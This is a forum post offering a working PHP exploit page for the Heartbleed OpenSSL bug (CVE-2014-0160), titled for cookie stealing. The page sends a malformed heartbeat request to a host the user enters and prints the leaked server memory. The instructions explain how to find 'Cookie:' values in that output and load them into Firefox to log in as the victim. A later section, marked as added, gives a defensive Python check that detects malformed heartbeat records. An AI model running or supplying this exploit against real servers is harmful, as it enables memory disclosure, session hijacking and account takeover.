Heartbeat ~ Cookie Stealing, PHP Version

chmood

Running it is quite simple: put the code below on your web server.
Then run it from a browser; it is actually more effective to use the CLI, but that is fine too.


Enter the host and the port (the standard one is 443), then submit.
To look for cookies, press CTRL + F in the browser and enter the text "Cookie:" without the quotes; if it is there, it means we can use those cookies to log in to the target website.


To move the target's cookies into Firefox you can use Mozilla Firefox add-ons such as Cookies Manager, Tamper Data, or Live HTTP Headers.
[url=https://addons.mozilla.org/id/firefox/addon/cookies-manager-plus/]Download Cookies Manager Plus[/url]


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta name="author" content="ExploreCrew" />
<title>Heartbeat ~ Cookie Stealing</title>
<style type="text/css">
<!--
h1,p{margin: 3px;padding: 3px;}
form,pre{width: 75%;border: 1px solid #ddd; margin: auto;padding: 3px;}
input[type='text']{width: 90%; margin: 13px;padding: 3px;}
input[type='submit']{padding: 10px; margin: 13px;}
-->
</style>
</head>
<body>
<form action="" method="post" enctype="multipart/form-data">
<h1>Heartbeat ~ CVE-2014-0160</h1>
<p></p>
<input type="text" name="host" placeholder="example.com" />
<input type="text" name="port" value="443" placeholder="443"/>
<input type="submit" name="submit" />
<p>by <a href="http://explorecrew.org">BlueBoyz @ ExploreCrew</a></p>
</form>
<br />

<pre>
<?php

if(isset($_POST['submit'])) {

// TLS 1.1 ClientHello record (content type 0x16, version 03 02) with a fixed
// cipher-suite list; the trailing "00 0f 00 01 01" is the heartbeat extension.
$hello = "16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01";

// Heartbeat record (content type 0x18): record length 00 03, message type 01
// (request), claimed payload length 40 00 (16384 bytes) with no payload at all.
$hb = "18 03 02 00 03 01 40 00";

// Turn a whitespace-separated hex dump (spaces or newlines) into a binary string.
function hexbin($string) {
    $bin = '';
    foreach (preg_split('/\s+/', trim($string)) as $str) {
        $bin .= chr(hexdec($str));
    }
    return $bin;
}

$fp = fsockopen($_POST['host'], (int)$_POST['port'], $errno, $errstr, 30);
if(!$fp) {
    echo htmlspecialchars($errstr, ENT_QUOTES, 'ISO-8859-1');
} else {
    echo "Connecting...\n";

    echo "Hello SSL\n";
    fwrite($fp, hexbin($hello));

    $is_hello = true;
    $is_hb = false;
    while(!feof($fp)) {
        if($is_hello == true) {
            // First read: the server's reply to the ClientHello.
            $buffer = fgets($fp, 4096);
            $is_hello = false;
        } else {
            $buffer = fgets($fp, 1024);
            if($is_hb == false) {
                echo "Sending heartbeat request...\n";
                fwrite($fp, hexbin($hb));
                $is_hb = true; // send the heartbeat request only once
            }
        }
        // The buffer is raw server memory and may contain markup, so escape it
        // before echoing it into the page; ISO-8859-1 keeps every byte.
        echo htmlspecialchars($buffer, ENT_QUOTES, 'ISO-8859-1');
    }
    fclose($fp);
}
}

?>
</pre>
</body>
</html>
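Defender-side check, added here as an example that is not part of the original post: it splits a byte stream into TLS records and flags any heartbeat record whose claimed payload length cannot be satisfied by the bytes actually received, which is the inconsistency behind CVE-2014-0160 and the basis of the IDS signatures written for it. The sample records are constructed; the first is the exact `$hb` record the script above sends, the second is a well-formed request, and the ClientHello header only shows that non-heartbeat records pass through untouched.

```python
import struct

HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16  # RFC 6520: at least 16 bytes of padding follow the payload

# Constructed samples (not captured traffic).
# The record the page's $hb sends: record length 3, claimed payload 0x4000, no payload.
MALFORMED_HB = bytes.fromhex("18 03 02 00 03 01 40 00")
# A well-formed request: 4-byte payload "ping" plus 16 bytes of padding.
BENIGN_HB = bytes.fromhex("18 03 02 00 17 01 00 04") + b"ping" + b"\x00" * 16
# A ClientHello record header with a 5-byte body, to show other records are skipped.
CLIENT_HELLO_HEAD = bytes.fromhex("16 03 02 00 05 01 00 00 01 00")


def parse_records(data):
    """Split a byte stream into (content_type, version, body) TLS records.

    Assumes the stream starts on a record boundary; a trailing partial
    record is returned with whatever bytes are available.
    """
    records = []
    pos = 0
    while pos + 5 <= len(data):
        ctype, major, minor, length = struct.unpack("!BBBH", data[pos:pos + 5])
        body = data[pos + 5:pos + 5 + length]
        records.append((ctype, (major, minor), body))
        pos += 5 + length
    return records


def check_heartbeat(body):
    """Return a finding for one heartbeat record body, or None if it is consistent."""
    if len(body) < 3:
        return "truncated heartbeat record"
    hb_type = body[0]
    claimed = struct.unpack("!H", body[1:3])[0]
    actual = len(body) - 3  # bytes present after type + length fields
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return f"unknown heartbeat type {hb_type}"
    # RFC 6520 requires payload_length + padding to fit inside the record;
    # a vulnerable peer instead copies `claimed` bytes from its own memory.
    if claimed + HB_PADDING > actual:
        return f"claimed payload {claimed} exceeds received {actual}"
    return None


def scan(data):
    """Run the heartbeat consistency check over every heartbeat record in a stream."""
    findings = []
    for ctype, _, body in parse_records(data):
        if ctype != HEARTBEAT:
            continue
        verdict = check_heartbeat(body)
        if verdict:
            findings.append(verdict)
    return findings


if __name__ == "__main__":
    print("malformed:", scan(MALFORMED_HB))
    print("benign:", scan(BENIGN_HB))
```

The same length test applied to heartbeat responses catches the server side of an exploitation attempt: a response record that carries far more payload than any request on the connection asked for is the indicator to alert on. The record splitter is deliberately minimal; on a reassembled TCP stream from a capture it is enough, but it does not track records spanning segment boundaries.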



